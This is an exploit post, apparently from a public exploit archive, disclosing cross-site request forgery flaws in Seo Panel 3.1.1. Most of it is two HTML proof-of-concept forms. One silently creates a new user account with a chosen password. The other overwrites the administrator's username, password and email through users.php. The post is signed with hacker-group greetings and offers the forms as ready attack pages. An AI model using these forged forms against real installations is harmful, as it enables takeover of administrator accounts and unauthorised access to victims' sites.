facebook facebook twitter rss

Seo Panel 3.1.1 Multiple CSRF Vulnerability

Author: Aboud-el , Published: 09-06-2012
Seo Panel 3.1.1 Multiple CSRF Vulnerability 
====================================================================

####################################################################
.:. Author : Aboud-EL [aboud_el@hotmail.com]
.:. Script : http://www.seopanel.in//
.:. Tested On Demo : http://demos1.softaculous.com/Seo_Panel/login.php
.:. Gr34T$ T0 [AtT4CKxT3rR0r1ST]

####################################################################

===[ Exploit ]===

[1]Add User
============

<html>
<head>
<title>Seo Panel 3.1.1 [Add User]</title>
</head>
<H2>CSRF Add User By aboud-el</H2>
<form method="POST" name="form0" action="http://localhost/Seo_Panel/users.php">
<input type="hidden" name="sec" value="create"/>
<input type="hidden" name="userName" value="user"/>
<input type="hidden" name="password" value="123456789"/>
<input type="hidden" name="confirmPassword" value="123456789"/>
<input type="hidden" name="firstName" value="usr"/>
<input type="hidden" name="lastName" value="usr"/>
<input type="hidden" name="email" value="Email@hotmail.com"/>
</form>

</body>
</html>

[2]Edit Account Admin
======================

<html>
<head>
<title>Seo Panel 3.1.1 [Edit Account Admin]</title>
</head>
<H2>CSRF Edit Account Admin By aboud-el</H2>
<form method="POST" name="form0" action="http://localhost/Seo_Panel/users.php">
<input type="hidden" name="sec" value="updatemyprofile"/>
<input type="hidden" name="oldName" value="admin"/>
<input type="hidden" name="id" value="1"/>
<input type="hidden" name="oldEmail" value="Email@hotmail.com"/>
<input type="hidden" name="userName" value="admin"/>
<input type="hidden" name="password" value="123456789"/>
<input type="hidden" name="confirmPassword" value="123456789"/>
<input type="hidden" name="firstName" value="System"/>
<input type="hidden" name="lastName" value="Administrator"/>
<input type="hidden" name="email" value="Email@hotmail.com"/>
</form>

</body>
</html>
####################################################################

Like us on Facebook :